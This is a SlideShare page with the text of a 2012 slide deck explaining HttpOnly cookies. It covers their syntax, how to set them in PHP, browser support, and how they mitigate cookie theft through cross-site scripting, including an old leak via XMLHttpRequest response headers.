Http only cookie

39,924 views
39,657 views

Published on

对httponly的cookie进行了详细介绍,并附带了丰富的演示

Published in: Technology
0 Comments
8 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
39,924
On SlideShare
0
From Embeds
0
Number of Embeds
28,419
Actions
Shares
0
Downloads
91
Comments
0
Likes
8
Embeds 0
No embeds

No notes for slide

Http only cookie

  1. 1. HttpOnly CookieSomething You Don’t Know About HTTP RDSS Team 2012-04
  2. 2. Author 兰七 yuxia0025@gmail.com
  3. 3. AboutRDSSResearch on Domain Specific SolutionWe focus on existed specification, solution, production etc.We put our research into practice.
  4. 4. Contents• Cookie Definition• HttpOnly Cookie• Browsers Supporting• Cross-site Scripting• XMLHTTPRequest• Finally
  5. 5. Cookie Definition
  6. 6. • A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is a piece of data stored by a website within a browser, and then subsequently sent back to the same website by the browserRefer: http://en.wikipedia.org/wiki/Http_cookie#HttpOnly_cookie 6
  7. 7. HttpOnly Cookie
  8. 8. Definition• HttpOnly is an additional flag included in a Set-Cookie HTTP response header.an HttpOnly session cookie will be used only when transmitting HTTP (or HTTPS) requests.Refer: http://en.wikipedia.org/wiki/Http_cookie#HttpOnly_cookie
  9. 9. Born • HttpOnly cookies were first implemented in 2002 by Microsoft Internet Explorer developers for Internet Explorer 6 SP1Refer:https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When. 9 3F
  10. 10. Feather • restricting access from other non- HTTP APIs (such as JavaScript). • restriction mitigates but does not eliminate the threat of session cookie theft via cross-site scripting (XSS).Refer:https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When. 10 3F
  11. 11. Syntax • Set-Cookie: USER(key)=123(value); expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnlyRefer:https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When. 11 3F
  12. 12. Set httpOnly Using PHP• Permanently. session.cookie_httponly = True (in php.iniPHP)• Setcookie("testcookie", $value, time()+3600, "/", "www.xx.com", 0 , 1);Refer: http://www.php.net/manual/en/function.setcookie.php 12
  13. 13. Browsers Supporting
  14. 14. Support • the cookie cannot be accessed through client side script, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.Refer:https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When. 3F
  15. 15. NOT Support • The HttpOnly flag will be ignored by the browser, thus creating a traditional, script accessible cookie. – document.cookieRefer:https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When. 3F
  16. 16. Browsers Supporting HttpOnly Cookie ie6 ie7 ie8 ie9 chrome firefox safari prevent write yes yes yes yes yes yes yes prevent read yes yes yes yes yes yes YesRefer:https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When. 3F
  17. 17. Refer: http://www.browserscope.org/security/test
  18. 18. WebGoatRefer: http://code.google.com/p/webgoat/
  19. 19. Cross-Site Scripting
  20. 20. Browser• is a server-side vulnerability that is often created when rendering user input as html.• e.g. expose sensitive information about users of the web siteRefer: http://msdn.microsoft.com/en-us/library/ms533046.aspx
  21. 21. ExampleRefer: http://msdn.microsoft.com/en-us/library/ms533046.aspx
  22. 22. XMLHTTPRequest
  23. 23. • getResponseHeader• getAllResponseHeadersRefer: http://ha.ckers.org/blog/20070719/firefox-implements-httponly-and- is-vulnerable-to-xmlhttprequest/
  24. 24. Set-Cookie && Set-Cookie2• Set-Cookie defined in RFC 2109• Set-Cookie2 defined in RFC 2965• one & more key-valueRefer: http://www.ietf.org/rfc/rfc2965.txt
  25. 25. Fixed Browsers• FireFox 3.0.0.6• IE• Safari5 && Chrome12• FireFox ban all cookie
  26. 26. Test Tool• Robert Hansens HTTPOnly test page now includes set-cookie and set- cookie2 checks for XMLHTTPRequest exposureRefer: http://ha.ckers.org/httponly.cgi.
  27. 27. Test Result ie6 ie7 ie8 ie9 chrome firefox safariA not not not not not not not httpOnly httpOnly httpOnly httpOnly httpOnly httpOnly httpOnlyB not not not not no no no httpOnly httpOnly httpOnly httpOnlyA - document,cookieB - xhr api
  28. 28. Finally
  29. 29. HttpOnly Cookie• Pros• Cons

×